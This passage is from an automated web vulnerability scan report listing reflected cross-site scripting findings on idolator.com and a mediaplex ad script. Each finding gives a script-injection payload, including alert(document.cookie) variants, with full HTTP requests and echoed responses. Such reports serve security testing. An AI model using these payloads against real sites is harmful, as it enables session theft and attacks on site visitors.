The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a72ab"><script>alert(1)</script>d943c835e04 was submitted in the REST URL parameter 2. This input was echoed as a72ab\"><script>alert(1)</script>d943c835e04 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themesa72ab"><script>alert(1)</script>d943c835e04/idolator_1.5/plugins/login-with-ajax/widget.css?ver=2.8.6 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:18 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:19 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 36005
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/themesa72ab\"><script>alert(1)</script>d943c835e04/idolator_1.5/plugins/login-with-ajax/widget.css?ver=2.8.6" />
...[SNIP]...

4.190. http://idolator.com/wp-content/themes/idolator_1.5/plugins/login-with-ajax/widget.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://idolator.com
Path:	/wp-content/themes/idolator_1.5/plugins/login-with-ajax/widget.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5fc25"><script>alert(1)</script>716e367f768 was submitted in the REST URL parameter 3. This input was echoed as 5fc25\"><script>alert(1)</script>716e367f768 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/idolator_1.55fc25"><script>alert(1)</script>716e367f768/plugins/login-with-ajax/widget.css?ver=2.8.6 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:29 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:30 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 36005
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/themes/idolator_1.55fc25\"><script>alert(1)</script>716e367f768/plugins/login-with-ajax/widget.css?ver=2.8.6" />
...[SNIP]...

4.191. http://idolator.com/wp-content/themes/idolator_1.5/plugins/login-with-ajax/widget.css [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://idolator.com
Path:	/wp-content/themes/idolator_1.5/plugins/login-with-ajax/widget.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d2b5"><script>alert(1)</script>7f9a9bea873 was submitted in the REST URL parameter 4. This input was echoed as 2d2b5\"><script>alert(1)</script>7f9a9bea873 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/idolator_1.5/plugins2d2b5"><script>alert(1)</script>7f9a9bea873/login-with-ajax/widget.css?ver=2.8.6 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:40 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:41 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 36005
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/themes/idolator_1.5/plugins2d2b5\"><script>alert(1)</script>7f9a9bea873/login-with-ajax/widget.css?ver=2.8.6" />
...[SNIP]...

4.192. http://idolator.com/wp-content/themes/idolator_1.5/plugins/login-with-ajax/widget.css [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://idolator.com
Path:	/wp-content/themes/idolator_1.5/plugins/login-with-ajax/widget.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f66e"><script>alert(1)</script>a868b0f424a was submitted in the REST URL parameter 5. This input was echoed as 6f66e\"><script>alert(1)</script>a868b0f424a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/idolator_1.5/plugins/login-with-ajax6f66e"><script>alert(1)</script>a868b0f424a/widget.css?ver=2.8.6 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:53 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:54 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 36005
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/themes/idolator_1.5/plugins/login-with-ajax6f66e\"><script>alert(1)</script>a868b0f424a/widget.css?ver=2.8.6" />
...[SNIP]...

4.193. http://idolator.com/wp-content/themes/idolator_1.5/plugins/login-with-ajax/widget.css [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://idolator.com
Path:	/wp-content/themes/idolator_1.5/plugins/login-with-ajax/widget.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57948"><script>alert(1)</script>74fe11a83cb was submitted in the REST URL parameter 6. This input was echoed as 57948\"><script>alert(1)</script>74fe11a83cb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/idolator_1.5/plugins/login-with-ajax/widget.css57948"><script>alert(1)</script>74fe11a83cb?ver=2.8.6 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:34:12 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:34:13 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 36005
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/themes/idolator_1.5/plugins/login-with-ajax/widget.css57948\"><script>alert(1)</script>74fe11a83cb?ver=2.8.6" />
...[SNIP]...

4.194. http://idolator.com/wp-includes/js/comment-reply.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://idolator.com
Path:	/wp-includes/js/comment-reply.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e72a"><script>alert(1)</script>1db3f6c0aa2 was submitted in the REST URL parameter 1. This input was echoed as 8e72a\"><script>alert(1)</script>1db3f6c0aa2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes8e72a"><script>alert(1)</script>1db3f6c0aa2/js/comment-reply.js?ver=20090102 HTTP/1.1
Host: idolator.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:21 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:21 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 35912
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-includes8e72a\"><script>alert(1)</script>1db3f6c0aa2/js/comment-reply.js?ver=20090102" />
...[SNIP]...

4.195. http://idolator.com/wp-includes/js/comment-reply.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://idolator.com
Path:	/wp-includes/js/comment-reply.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 827e3"><script>alert(1)</script>59e22d40bce was submitted in the REST URL parameter 2. This input was echoed as 827e3\"><script>alert(1)</script>59e22d40bce in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/js827e3"><script>alert(1)</script>59e22d40bce/comment-reply.js?ver=20090102 HTTP/1.1
Host: idolator.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:31 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:32 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 35912
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-includes/js827e3\"><script>alert(1)</script>59e22d40bce/comment-reply.js?ver=20090102" />
...[SNIP]...

4.196. http://idolator.com/wp-includes/js/comment-reply.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://idolator.com
Path:	/wp-includes/js/comment-reply.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3204"><script>alert(1)</script>a49b7a25c4c was submitted in the REST URL parameter 3. This input was echoed as f3204\"><script>alert(1)</script>a49b7a25c4c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/js/comment-reply.jsf3204"><script>alert(1)</script>a49b7a25c4c?ver=20090102 HTTP/1.1
Host: idolator.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:45 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:46 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 35912
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-includes/js/comment-reply.jsf3204\"><script>alert(1)</script>a49b7a25c4c?ver=20090102" />
...[SNIP]...

4.197. http://img.mediaplex.com/content/0/12309/129868/1361274_us_smb_q1w12_728x90_mcsft_firstserver_dtp1a.js [mpck parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/12309/129868/1361274_us_smb_q1w12_728x90_mcsft_firstserver_dtp1a.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f3045'%3balert(1)//44230265778 was submitted in the mpck parameter. This input was echoed as f3045';alert(1)//44230265778 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/12309/129868/1361274_us_smb_q1w12_728x90_mcsft_firstserver_dtp1a.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F12309-129868-23636-1%3Fmpt%3D6245544f3045'%3balert(1)//44230265778&mpjs=rt.legolas-media.com%2Flgrt%3Fci%3D2%26ti%3D361&mpt=6245544&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b25/17/1e8/%2a/n%3B241904200%3B0-0%3B4%3B40342997%3B3454-728/90%3B42422626/42440413/1%3Bu%3Drmxli_3163700|surl_http%3A//thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html%3B%7Esscs%3D%3fhttp://ad.yieldmanager.com/clk?2,13%3Becb025846c58424b%3B13088ae1ef6,0%3B%3B%3B4270644083,mTsCACJqCwC3E5MAAAAAADPOJAAAAAAAAgAAAAYAAAAAAP8AAAACB4FnFAAAAAAAuowIAAAAAAA0RjAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADx4gUAAAAAAAIAAwAAAAAA9R6uiDABAAAAAAAAADI0NjFiNzE2LTk1YWQtMTFlMC1hMjVlLWUzNmM1YTM3NjJiYQAAAAAAAAA=,,http%3A%2F%2Fthesouthern.com%2Fsports%2Fbasketball%2Farticle_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html%3Fc03b0%22-alert%28document.cookie%29-%225958ea17fd2%3D1, HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?mTsCACJqCwC3E5MAAAAAADPOJAAAAAAAAgAAAAYAAAAAAP8AAAACB4FnFAAAAAAAuowIAAAAAAA0RjAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADx4gUAAAAAAAIAAwAAAAAAUrgeheuRCECamZmZmZkKQM8tcer33BlAAAAAAAAAHEDQLXHq99wZQAAAAAAAABxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACOmofmodM-CgUplvRSzdlkmEMRVc6kOd6J3c5dAAAAAA==,,http%3A%2F%2Fthesouthern.com%2Fsports%2Fbasketball%2Farticle_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html%3Fc03b0%22-alert%28document.cookie%29-%225958ea17fd2%3D1,Z%3D728x90%26_salt%3D1188639314%26anmember%3D514%26anprice%3D220%26r%3D1%26s%3D748066,2461b716-95ad-11e0-a25e-e36c5a3762ba
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; mojo2=14302:16279/13198:5934; mojo3=12309:23636/17038:20406/9966:1105/17550:1884/15017:13113/14302:40017/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/9608:1178/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:20:36 GMT
Server: Apache
Last-Modified: Fri, 27 May 2011 15:56:55 GMT
ETag: "63cd71-1097-4a443fca0bfc0"
Accept-Ranges: bytes
Content-Length: 7403
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
tp://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html?c03b0"-alert(document.cookie)-"5958ea17fd2=1,http://altfarm.mediaplex.com/ad/ck/12309-129868-23636-1?mpt=6245544f3045';alert(1)//44230265778" target="_blank">
...[SNIP]...

4.198. http://img.mediaplex.com/content/0/12309/129868/1361274_us_smb_q1w12_728x90_mcsft_firstserver_dtp1a.js [mpck parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/12309/129868/1361274_us_smb_q1w12_728x90_mcsft_firstserver_dtp1a.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e088"-alert(1)-"3bb496111fb was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/12309/129868/1361274_us_smb_q1w12_728x90_mcsft_firstserver_dtp1a.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F12309-129868-23636-1%3Fmpt%3D62455443e088"-alert(1)-"3bb496111fb&mpjs=rt.legolas-media.com%2Flgrt%3Fci%3D2%26ti%3D361&mpt=6245544&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b25/17/1e8/%2a/n%3B241904200%3B0-0%3B4%3B40342997%3B3454-728/90%3B42422626/42440413/1%3Bu%3Drmxli_3163700|surl_http%3A//thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html%3B%7Esscs%3D%3fhttp://ad.yieldmanager.com/clk?2,13%3Becb025846c58424b%3B13088ae1ef6,0%3B%3B%3B4270644083,mTsCACJqCwC3E5MAAAAAADPOJAAAAAAAAgAAAAYAAAAAAP8AAAACB4FnFAAAAAAAuowIAAAAAAA0RjAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADx4gUAAAAAAAIAAwAAAAAA9R6uiDABAAAAAAAAADI0NjFiNzE2LTk1YWQtMTFlMC1hMjVlLWUzNmM1YTM3NjJiYQAAAAAAAAA=,,http%3A%2F%2Fthesouthern.com%2Fsports%2Fbasketball%2Farticle_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html%3Fc03b0%22-alert%28document.cookie%29-%225958ea17fd2%3D1, HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?mTsCACJqCwC3E5MAAAAAADPOJAAAAAAAAgAAAAYAAAAAAP8AAAACB4FnFAAAAAAAuowIAAAAAAA0RjAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADx4gUAAAAAAAIAAwAAAAAAUrgeheuRCECamZmZmZkKQM8tcer33BlAAAAAAAAAHEDQLXHq99wZQAAAAAAAABxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACOmofmodM-CgUplvRSzdlkmEMRVc6kOd6J3c5dAAAAAA==,,http%3A%2F%2Fthesouthern.com%2Fsports%2Fbasketball%2Farticle_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html%3Fc03b0%22-alert%28document.cookie%29-%225958ea17fd2%3D1,Z%3D728x90%26_salt%3D1188639314%26anmember%3D514%26anprice%3D220%26r%3D1%26s%3D748066,2461b716-95ad-11e0-a25e-e36c5a3762ba
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; mojo2=14302:16279/13198:5934; mojo3=12309:23636/17038:20406/9966:1105/17550:1884/15017:13113/14302:40017/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/9608:1178/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:20:33 GMT
Server: Apache
Last-Modified: Fri, 27 May 2011 15:56:55 GMT
ETag: "63cd71-1097-4a443fca0bfc0"
Accept-Ranges: bytes
Content-Length: 7397
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<mpcke/>';
if (mpcke == 1) {
mpcclick = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F12309-129868-23636-1%3Fmpt%3D62455443e088"-alert(1)-"3bb496111fb");
mpck = "http://" + mpcclick;
}
else if (mpcke == 2) {
mpcclick2 = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F12309-129868-23636-1%3Fmpt%3D62455443e088"-alert(1)-"3bb496111fb");
mpck = "h
...[SNIP]...

4.199. http://img.mediaplex.com/content/0/12309/129868/1361274_us_smb_q1w12_728x90_mcsft_firstserver_dtp1a.js [mpjs parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/12309/129868/1361274_us_smb_q1w12_728x90_mcsft_firstserver_dtp1a.js

Issue detail

The value of the mpjs request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3ac9f"%3balert(1)//5d50101527c was submitted in the mpjs parameter. This input was echoed as 3ac9f";alert(1)//5d50101527c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/12309/129868/1361274_us_smb_q1w12_728x90_mcsft_firstserver_dtp1a.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F12309-129868-23636-1%3Fmpt%3D6245544&mpjs=rt.legolas-media.com%2Flgrt%3Fci%3D2%26ti%3D3613ac9f"%3balert(1)//5d50101527c&mpt=6245544&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b25/17/1e8/%2a/n%3B241904200%3B0-0%3B4%3B40342997%3B3454-728/90%3B42422626/42440413/1%3Bu%3Drmxli_3163700|surl_http%3A//thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html%3B%7Esscs%3D%3fhttp://ad.yieldmanager.com/clk?2,13%3Becb025846c58424b%3B13088ae1ef6,0%3B%3B%3B4270644083,mTsCACJqCwC3E5MAAAAAADPOJAAAAAAAAgAAAAYAAAAAAP8AAAACB4FnFAAAAAAAuowIAAAAAAA0RjAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADx4gUAAAAAAAIAAwAAAAAA9R6uiDABAAAAAAAAADI0NjFiNzE2LTk1YWQtMTFlMC1hMjVlLWUzNmM1YTM3NjJiYQAAAAAAAAA=,,http%3A%2F%2Fthesouthern.com%2Fsports%2Fbasketball%2Farticle_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html%3Fc03b0%22-alert%28document.cookie%29-%225958ea17fd2%3D1, HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
